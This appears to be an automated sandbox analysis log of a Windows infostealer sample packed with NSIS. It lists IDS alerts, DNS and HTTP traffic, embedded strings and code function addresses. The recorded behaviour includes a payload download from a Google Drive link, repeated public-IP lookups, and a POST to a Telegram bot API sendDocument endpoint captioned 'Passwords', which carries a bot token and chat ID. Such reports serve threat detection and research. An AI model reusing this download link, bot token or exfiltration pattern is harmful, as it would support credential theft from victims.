            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49970 -> 142.250.186.110:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WxElmKXXL7CIzaDrqhpdM8ML23VzYG37 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1WxElmKXXL7CIzaDrqhpdM8ML23VzYG37&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49973 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WxElmKXXL7CIzaDrqhpdM8ML23VzYG37 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1WxElmKXXL7CIzaDrqhpdM8ML23VzYG37&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a2051f68ffHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003546E000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035351000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035512000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003546E000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035351000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035512000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035300000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003516F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003546E000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035351000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035512000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035163000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035300000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003516F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: V7OHj6ISEo.exe, 00000007.00000002.2563111506.00000000350F1000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2564904168.00000000371F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: V7OHj6ISEo.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: V7OHj6ISEo.exe, 00000007.00000002.2563111506.00000000350F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003546E000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035351000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035512000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: V7OHj6ISEo.exe, 00000007.00000003.1974851418.0000000004961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: V7OHj6ISEo.exe, 00000007.00000002.2542671564.00000000048E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: V7OHj6ISEo.exe, 00000007.00000002.2542671564.00000000048E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/L
            Source: V7OHj6ISEo.exe, 00000007.00000002.2542671564.0000000004921000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2543131786.00000000063C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WxElmKXXL7CIzaDrqhpdM8ML23VzYG37
            Source: V7OHj6ISEo.exe, 00000007.00000002.2542671564.0000000004921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WxElmKXXL7CIzaDrqhpdM8ML23VzYG37D
            Source: V7OHj6ISEo.exe, 00000007.00000002.2542671564.000000000494A000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000003.2009686731.0000000004960000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000003.2009633754.0000000004959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: V7OHj6ISEo.exe, 00000007.00000002.2542671564.000000000494A000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000003.2009686731.0000000004960000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000003.2009633754.0000000004959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/I
            Source: V7OHj6ISEo.exe, 00000007.00000002.2542671564.000000000494A000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000003.2009686731.0000000004960000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2542671564.0000000004940000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000003.1974851418.0000000004961000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000003.2009633754.0000000004959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WxElmKXXL7CIzaDrqhpdM8ML23VzYG37&export=download
            Source: V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003516F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003516F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003516F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: V7OHj6ISEo.exe, 00000007.00000003.1974851418.0000000004961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: V7OHj6ISEo.exe, 00000007.00000003.1974851418.0000000004961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: V7OHj6ISEo.exe, 00000007.00000003.1974851418.0000000004961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: V7OHj6ISEo.exe, 00000007.00000003.1974851418.0000000004961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: V7OHj6ISEo.exe, 00000007.00000003.1974851418.0000000004961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: V7OHj6ISEo.exe, 00000007.00000003.1974851418.0000000004961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: V7OHj6ISEo.exe, 00000007.00000003.1974851418.0000000004961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: V7OHj6ISEo.exe, 00000007.00000003.1974851418.0000000004961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
            Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
            Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.7:49970 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.7:49971 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49974 version: TLS 1.2
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_0040558F
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004034A5
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,7_2_004034A5
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_00404DCC1_2_00404DCC
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_00406AF21_2_00406AF2
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_75561B5F1_2_75561B5F
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_00404DCC7_2_00404DCC
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_00406AF27_2_00406AF2
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_001543287_2_00154328
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_00158DA07_2_00158DA0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_001559687_2_00155968
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_00155F907_2_00155F90
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_00152DD17_2_00152DD1
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CCCA07_2_350CCCA0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350C76287_2_350C7628
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CC6387_2_350CC638
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CF6497_2_350CF649
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350C21307_2_350C2130
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350C33187_2_350C3318
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350C03AF7_2_350C03AF
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CBD887_2_350CBD88
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CCC917_2_350CCC91
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CB4EC7_2_350CB4EC
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CE79F7_2_350CE79F
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350C6E917_2_350C6E91
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350C6EA07_2_350C6EA0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CDEE17_2_350CDEE1
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CB9447_2_350CB944
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CC1F27_2_350CC1F2
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350C78487_2_350C7848
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CF0437_2_350CF043
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CB07F7_2_350CB07F
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350C6B017_2_350C6B01
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CE3397_2_350CE339
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CEBF77_2_350CEBF7
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CDA897_2_350CDA89
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350C6AE37_2_350C6AE3
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D196C87_2_37D196C8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D186507_2_37D18650
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D1BDF07_2_37D1BDF0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D19D107_2_37D19D10
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D114007_2_37D11400
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D1A3607_2_37D1A360
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D1BA977_2_37D1BA97
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D1A9B07_2_37D1A9B0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D167C07_2_37D167C0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D1AFF87_2_37D1AFF8
